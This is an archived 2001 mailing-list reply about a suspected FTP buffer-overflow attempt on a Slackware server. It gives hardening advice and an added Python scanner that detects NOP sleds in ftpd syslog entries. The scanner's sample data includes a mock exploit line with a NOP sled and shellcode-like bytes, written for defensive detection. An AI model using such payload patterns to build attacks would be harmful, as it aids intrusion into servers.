Re: Linux ftpd

From: centipede (centipedat_private)
Date: Sat Jun 09 2001 - 09:25:41 PDT


    Simple. Another intrusion from APNIC... the swamp...
    It's a buffer overflow exploit they were trying to run on your ftp server.
    Whether they succeeded or not I cannot say.
    There's a lot to be done:
    - D'ya really need those anonymous connections? If not, shut the door closed.
    - D'ya use the latest version of your server?
    - D'ya employ any packet filtering device? If you do, block the swamp out...
    - Use TCP Wrapper to limit connections from known IPs.
    
    centipede.
    
    mrcbisat_private wrote:
    
    > I have a linux-box running slackware 7.1 with kernel 2.2.18 acting as
    > office-server; we have an internet-connection in dial-up to an ISP near us.
    > Today I was looking into log-files, I found, in /var/log/messages the
    > following message:
    > Jun  3 21:30:05 sassuolo ftpd[24355]: ANONYMOUS FTP LOGIN FROM
    > 202.239.131.55 [202.239.131.55],
    > 
    > repeated twice within a few minutes. I think it was an intrusion attempt. My
    > linux-box is connected to the internet with a dynamic IP address. Can
    > someone help me?
    > Best regards
    > 
    > 
    > 						Marco Bisio
    > 
    > 
    > 
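    A defender's check that follows from the thread, written as an added example (not code from the original posts): a small scanner over syslog lines that flags ftpd anonymous-login entries whose password/ident field is a long run of <90> bytes, the way syslog renders an x86 NOP sled. The hostnames, IPs and log lines below are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Format written by a BSD-derived ftpd:
#   "... ftpd[PID]: ANONYMOUS FTP LOGIN FROM host [ip], <password field>"
LOGIN_RE = re.compile(
    r"ftpd\[(?P<pid>\d+)\]: ANONYMOUS FTP LOGIN FROM (?P<host>\S+) "
    r"\[(?P<ip>[^\]]+)\], (?P<ident>.*)$"
)
# syslog renders non-printable bytes as <XX>; 0x90 is the x86 NOP used to pad a sled
ESCAPED_BYTE_RE = re.compile(r"<[0-9A-F]{2}>")
NOP_SLED_RE = re.compile(r"(?:<90>){8,}")


@dataclass
class Finding:
    pid: int
    ip: str
    sled_len: int        # longest run of consecutive <90> tokens
    escaped_bytes: int   # total non-printable bytes in the ident field


def inspect_line(line: str, min_sled: int = 16) -> Optional[Finding]:
    """Return a Finding when the anonymous-login ident field carries a NOP sled."""
    m = LOGIN_RE.search(line)
    if not m:
        return None
    ident = m.group("ident")
    runs = [len(r) // 4 for r in NOP_SLED_RE.findall(ident)]  # "<90>" is 4 chars
    sled_len = max(runs, default=0)
    if sled_len < min_sled:
        return None
    escaped = len(ESCAPED_BYTE_RE.findall(ident))
    return Finding(int(m.group("pid")), m.group("ip"), sled_len, escaped)


def scan(lines: List[str]) -> List[Finding]:
    return [f for f in (inspect_line(l) for l in lines) if f is not None]


# Constructed sample lines: one benign anonymous login, one with a sled + a few raw bytes.
SAMPLE_LOG = [
    "Jun  3 21:10:02 sassuolo ftpd[24301]: ANONYMOUS FTP LOGIN FROM "
    "mail.example.net [192.0.2.10], mozilla@",
    "Jun  3 21:30:05 sassuolo ftpd[24355]: ANONYMOUS FTP LOGIN FROM "
    "198.51.100.7 [198.51.100.7], " + "<90>" * 40 + "1<C0><CD><80>",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"pid={f.pid} from {f.ip}: NOP sled of {f.sled_len} bytes, "
              f"{f.escaped_bytes} raw bytes in ident field")
```

    Run against /var/log/messages, a hit is the cue to apply the measures above (drop anonymous FTP, patch the daemon, filter or wrap the source) and to check the box for signs the attempt succeeded.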
    



    This archive was generated by hypermail 2b30 : Sat Jun 09 2001 - 09:47:31 PDT